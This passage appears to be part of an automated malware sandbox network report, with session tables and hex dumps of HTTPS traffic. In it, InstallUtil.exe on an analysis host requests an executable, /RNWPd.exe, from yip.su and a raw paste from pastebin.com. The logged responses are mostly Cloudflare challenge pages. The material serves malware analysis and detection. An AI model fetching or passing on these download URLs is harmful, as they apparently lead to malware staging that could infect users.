<![endif]-->...[if
2024-08-11 09:22:31 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:31 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:31 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49728	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:31 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:32 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:32 UTC	691	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 69 4d 30 4a 79 66 2b 66 6b 50 49 35 48 5a 53 63 4c 76 66 37 48 32 62 6a 46 61 34 45 36 72 75 7a 64 42 45 36 42 71 2b 79 6d 43 6a 35 53 43 44 4d 52 46 77 45 6d 79 63 69 77 4b 75 61 4f 63 79 39 2b 73 37 45 70 43 58 6d 31 70 67 2f 6a 4a 42 70 2f 65 2b 58 32 64 42 41 55 4d 5a 74 71 71 61 39 56 69 41 66 2f 44 74 48 44 45 34 3d 24 58 54 2f 6f 6f 47 4d 52 6e 35 48 34 31 30 6c 2b 38 6a 34 76 65 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: iM0Jyf+fkPI5HZScLvf7H2bjFa4E6ruzdBE6Bq+ymCj5SCDMRFwEmyciwKuaOcy9+s7EpCXm1pg/jJBp/e+X2dBAUMZtqqa9ViAf/DtHDE4=$XT/ooGMRn5H410l+8j4vew==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 33 62 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3be7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 37 36 32 37 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 39 36 35 65 63 39 61 35 65 36 34 27 2c 63 48 61 73 68 3a 20 27 66 63 65 61 39 61 32 31 39 38 30 33 35 32 35 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 68 61 58 59 63 58 55 4c 4b 52 45 46 54 6a 38 34 6a 68 6e 65 62 4d 73 35 32 79 64 72 56 6a 41 72 30 58 44 62 66 41 66 39 48 4c 63 2d 31 37 32 33 33 36 38 31 35 31 2d 30 2e 30 2e 31 2e 31 2d 33 36 30 34 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '97627',cRay: '8b172965ec9a5e64',cHash: 'fcea9a219803525',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=haXYcXULKREFTj84jhnebMs52ydrVjAr0XDbfAf9HLc-1723368151-0.0.1.1-3604",cFPWv: 'g',cTTim
2024-08-11 09:22:32 UTC	1369	IN	Data Raw: 65 71 53 79 70 76 54 43 4e 6e 7a 54 74 74 54 58 58 71 63 79 72 72 50 6e 49 55 35 6c 6d 54 74 57 5f 50 71 5f 72 6d 39 73 6f 62 6c 6b 5a 67 6b 78 32 31 51 61 37 78 6c 6f 62 63 44 77 55 4e 42 54 47 4d 48 45 76 46 4a 58 57 4b 67 69 30 5a 42 32 42 44 6c 79 61 52 71 34 65 42 67 43 79 35 70 79 78 34 62 38 67 6c 58 6a 6d 79 58 54 61 65 39 74 6d 45 74 4f 49 43 56 70 67 36 74 6f 70 6e 45 72 63 62 50 68 4b 6a 41 61 5a 4c 79 32 70 34 38 75 30 53 58 37 78 79 7a 58 47 48 64 4d 77 6a 46 30 41 76 58 70 67 63 4e 39 64 75 4d 50 72 54 62 66 57 4d 35 6b 51 41 6c 61 56 69 6a 44 57 4b 4b 4f 41 6b 45 33 71 64 67 55 62 6e 6d 56 61 70 7a 4a 41 4d 50 70 79 63 76 55 75 6b 62 51 69 73 78 55 76 58 70 68 78 64 51 59 65 36 44 43 30 51 57 6b 39 31 70 66 44 68 58 75 67 59 51 43 39 55 6c Data Ascii: eqSypvTCNnzTttTXXqcyrrPnIU5lmTtW_Pq_rm9soblkZgkx21Qa7xlobcDwUNBTGMHEvFJXWKgi0ZB2BDlyaRq4eBgCy5pyx4b8glXjmyXTae9tmEtOICVpg6topnErcbPhKjAaZLy2p48u0SX7xyzXGHdMwjF0AvXpgcN9duMPrTbfWM5kQAlaVijDWKKOAkE3qdgUbnmVapzJAMPpycvUukbQisxUvXphxdQYe6DC0QWk91pfDhXugYQC9Ul

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49729	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:37 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:37 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b172985dac45e72-EWR
2024-08-11 09:22:37 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:37 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49730	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:37 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
